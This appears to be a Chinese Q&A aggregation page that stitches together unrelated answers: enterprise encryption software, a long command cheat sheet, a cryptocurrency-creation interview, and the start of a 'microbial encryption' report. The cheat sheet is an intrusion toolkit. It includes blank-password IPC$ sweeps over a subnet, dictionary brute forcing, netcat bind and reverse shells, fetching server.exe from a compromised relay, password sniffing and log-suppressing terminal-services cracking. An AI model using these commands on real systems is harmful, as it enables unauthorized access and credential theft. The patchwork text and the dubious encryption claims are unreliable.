㈠ 企业安装加密软件的重要性
根据调查数据显示,2017年全球50%以上的企业至少遭遇过一场数据泄露事件。而因为合作伙伴或第三方的原因被泄露信息的企业超过1/3。今年明显超过去年,数据安全已成为企业面临的重大问题!很多企业已经安装了数据防泄密系统,保护企业数据安全。
发生数据泄露的原因是多方面的。分为内部泄密和外部泄密,最大的泄露途径则来源于企业内部。这是因为业务流程长、参与人员多和全面监管难。外部泄密中软件本身存在的漏洞是一个原因,这很容易被黑客利用发起大规模的入侵。调查显示,41%的外部攻击是利用了已知的软件漏洞。这方面典型的案例是WannaCry事件,这可能是2017年最严重的数据安全事件。
对待企业数据安全问题,如果从技术上考虑,采用数据防泄密系统或许是理想的解决方案。数据加密系统采用高强度加密算法,如AES256,512,SM2、SM3等。并结合透明加密技术,可以实现数据安全的同时做到方便快捷。数据加密系统也被称为防泄密软件,数据防泄密系统在加密数据的同时,通过一些策略部署,可以做到文件在企业内部传输流通无碍,而一旦被外泄,则被高强度加密保护,不能被获取真实有用的信息。
近几年频发的数据安全事件,提醒这各大企业要把保护企业数据安全提上日程,数据防泄密系统安装也是越发的必要了
㈡ 给一些常用的运行命令吧
cmd (命令字符提示窗口)
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schele)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
ipadmin$svv.exe c: 或:ipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )
三:
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
四:
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cp 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cp 进入远程主机目录的父目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqlmp --opt school>school.bbb 备份数据库:(命令在DOS的mysql in目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
六:
linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
七:
2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”
(二)系统外部命令(均需下载相关工具):
1、瑞士军刀:nc.exe
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用:nc -l -p 本机端口
在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
< 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中
>与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。
如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。
八:
2、扫锚工具:xscan.exe
基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
九:
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
4、终端服务密码破解: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使
㈢ 如何快速创建自己的加密货币
5步教你创建属于自己的加密货币
当你看到制作出实物钞票要多么复杂时,就很容易明白为什么大多数人不会每天都开始尝试印制新形式的货币,但对于只有基础编程水平的人来说,制造出新的数字货币也会非常容易。
编程并不是制造新的数字货币的唯一步骤。下面是三个加密货币制造商给出您应遵循的五个步骤。
1、使用社区培育货币
克里斯·埃利斯是一位来自伦敦的企业家,同时也是羽毛币社区活动家,他认为,当你考虑制造一个新的数字货币时,很容易假设第一步就应该开始货币编程,其实这是错误的。
“第一步是找到一个社区,并在社区周围建立一种货币,而不是在建立一种货币后指望着人们都能出现,”埃利斯说,“它必须符合社区的需求,并与他们的文化遗产和背景相关。”
羽毛币由彼得·布什内尔在2013年4月创建。布什内尔在牛津大学布雷奇诺斯学院辞去了他的IT主管职位,因为他想自己创造一个以人为中心的货币。他在一个知名加密货币网站bitcointalk.org上看到,现有加密货币(比如比特币)缺乏社区参与和包容性,随即做出上述决定。
自去年3月以来,埃利斯一直积极宣传和向人们教授加密货币的知识,虽然当时还没有遇到布什内尔,但也感同身受的意识到比特币论坛上的那种疏远化和隔离感。
“这些论坛非常注重技术,对新人或少数群体并不欢迎,通常较小的团队能更好地服务这些新人或少数群体,”埃利斯说。“论坛并没有让人们更便捷地参与货币开发。这些论坛上的很多人都来预测价格而不是主动参与开发。”
埃利斯找到了基于羽毛币的加密货币社区,他表示,技术发展从社区中获益颇多。
“我们是一群羽毛币的加密爱好者,但是其中的一些新手要是在其他社区,可能不会这么轻易地融入进去”, 埃利斯说。他表示,羽毛币的每个人都认为,重要的是要展示出一群忠实的人能够建立稳定的货币。通过合作,一个专门的加密爱好者社区能够更好地发现并解决漏洞和安全威胁,例如羽毛币编码社区成功抵御了51%的攻击。
建立这种保护措施并促进货币的发展,可以使货币在公众眼中更合法,更容易被信任。可如果参与其中的都是一群只为私利的被动观察者,这就麻烦了。
2、编程,为了长期的利益
令人惊讶的是,与我交谈的每一位货币开发人员都说过同样的事情:“对加密货币编程通常是流程中耗时最少的部分。这是因为现在市场上的所有加密货币都基于GitHub上提供的比特币或莱特币的开源代码。”
Coino的创始人之一皮特·奥特巴赫表示:“创作本身并不需要很长时间。 这可能只有一天”,该公司自称是市场上最快的加密货币,最大交易时间仅为50秒。“要想开始编程,只需要会C ++就可以在其中创建自己的功能。”
据夸克加密货币开发商科林·埃文斯称,时间可能比一天长一点。“在编程方面,最复杂的步骤可能与您计划拥有区块链的各个参数的复杂程度有关,” 埃文斯说。“例如,很多货币只是使用并复制莱特币代码,但是夸克有一个全新的Hash算法 - 也就是说,它与比特币和莱特币都是分开的 - 所以如果想要改变,这方面肯定会是最困难的。”在这种情况下对加密货币编程可能需要几个月的时间。 但是,埃文斯指出,如果开发人员只是重复使用GitHub的代码并只更改一些简单的参数,那么任何一个有能力的编程人员都可以在“30分钟内完成”。
但仅仅认为任何掌握C ++技能的人,都可以制作自己的加密货币,并不意味着有一天货币种类会像iOS应用那样多,“羽毛币事实上是莱特币的一个分支,”埃利斯说。“它始于最小数量的参数变化,因为我们认为货币最重要的特征是生存能力。”
然而,羽毛币团队注意到,之前出现的一些货币并没有持续很长时间,因为它们包含了一个新功能,该功能可使投资者通过短期投机炒作盈利,但随后团队常无法长期按计划管理项目,致使项目失败。换句话说,那些失败的货币开发者可能想要短期创建加密货币并从中赢利,而不是进行长期开发——这从一开始就注定了会失败。
埃利斯表示:“必须要对修复缺陷负责,并且在推出货币时做出承诺,也有责任告知人们风险并保护他们的财产,” 如果你不能这样做,那么没有人会一直使用你的货币。
3、让矿工登场
一旦你开发了货币,就需要把信息传播出去,以便人们开始挖掘这种货币,让人们意识到它的存在,并有望开始在矿工和用户眼中得到一些价值。这就是加密货币制造商不能像程序员一样思考的地方,而是要研究人类如何将信任(和价值)置于事物之中。
羽毛币的埃利斯解释说:“一个好的开始就是成功了一半,因此这涉及建立信任,向矿工们表达您的愿景和意图,他们拥有所需的硬件,并让他们有机会迎接未来的机遇。“你必须诚实并尊重人们的期望和对风险的宽容,这是很多人看重的。
“货币销售量过热会适得其反, 包括那些只是为了尝试或为了脱颖而出而设计的新功能也不起作用。市场可以测试勇气和决心。你需要一群忠于初心,忠诚的矿工,即使在价格暴跌时也会处理交易,因为他们相信最终的结果。 这取决于良好的沟通和团队建设。
“许多加密货币因为低估了‘软件’而失败了,他们认为用技术可以解决所有问题。 然后事情并不是像他们所想象的那样。你必须善于意识到需要完成哪些工作,并准备好做别人不想做的工作。”
4、了解你的商家
如果你已经做到了这一点。 你已经将一个优秀的加密货币概念化,并将正确的团队聚在一起,沿着自己的方式进行培养和培育。你已经在加密货币论坛上传播了这个消息,并且有一大批矿工正积极努力挖掘你的货币。下一步就是营销你的货币,以便所有挖矿人都可以使用它。这是不小的壮举。毕竟,你需要说服个人和商家自己创造的这些货币拥有价值,并且可以像传统可被信任的货币一样进行交易。
“这是一个建立信心的过程,”埃利斯说。“需要很好的管理,花时间来制定出你真正相信和主张的东西。相比你的行动,人们会更愿意基于你的动机来购买货币,所以一旦你有信心,就必须开始向朋友,商人,在互联网论坛和社交媒体上讨论你的货币。”
皮特·奥特巴赫认同此种观点,“开始营销需要找到确切的目标群体,”他说, “起初你可以从加密货币市场开始,因为那里的人知道这种货币,你会看到他们的第一反应。之后会变得更加困难。你需要说服许多甚至不知道加密货币是什么的人,所以你必须把货币作为在线商店的支付解决方案,来吸引他们关注。”
“我想补充说,不仅仅是用事实来教育他们,”埃利斯说,“这是为了鼓励他们学习和发现自己的优势。 金钱是一个分类账户,它是人们用来达到目标和满足其需求的一种工具。 了解这一点将会使你在营销工作中取得长足的进步。”
埃利斯认为,让商人接纳货币和让采矿者接纳相似,关键是了解他们不同的观点。 “不同的利益相关者,却有相同的规则。区别在于矿工有投机情绪,相比来说商人更保守。”他指出,商人有三个主要目的:赚钱,省钱,提高他们的意识。“如果能够在降低支付费用的同时,为他们带来客户并提高销售额,其余的工作就是坚持不懈,让他们尽可能轻松地开始工作。”
5、结论
论是从专业的角度,还是传统的观点,制造加密货币之旅的最后一步,就是用货币统治世界。但鉴于5000年以来没有任何一种货币可以统治全球,不管硅谷比特币爱好者说什么 - 任何一种加密货币都是如此。
此外,加密货币统治全球“并不一定是目标,”埃利斯说。“货币可以是本地的,实际上我们认为羽毛币是可以服务于全球市场的本地货币。”
其中可能蕴藏着新兴加密货币领域的真正市场:某些社区,城市,活动,场地和人群的本地货币。围绕着志同道合的消费者群体建立,使他们能够快速自由地进行交易,并为他们生活中重要的商品和服务提供安全保障。而不必依靠中央银行和大型市场来告诉他们,不管是硬币还是纸币,都具有价值。
㈣ 生物加密技术是怎么回事
微生物加密技术可行性报告
一.概述:
随着科技水平的日益提高,人们对信息安全也越来越重视,加密技术的研究已经越来越成熟。目前比较安全的加密技术是量子加密技术。但随着计算机技术的发展,原来用普通计算机无法破解的量子加密技术现在也可以通过高速量子计算机进行解密。其他的一些加密技术就更不安全了。难道就没有一种极其安全的加密技术了吗?有,这里我要介绍一种新的加密技术——微生物加密技术。生物加密技术是一项新型的加密技术,它和传统的物理加密,电子加密技术、量子加密技术在原理上有很大的不同。
二.实现原理及要点
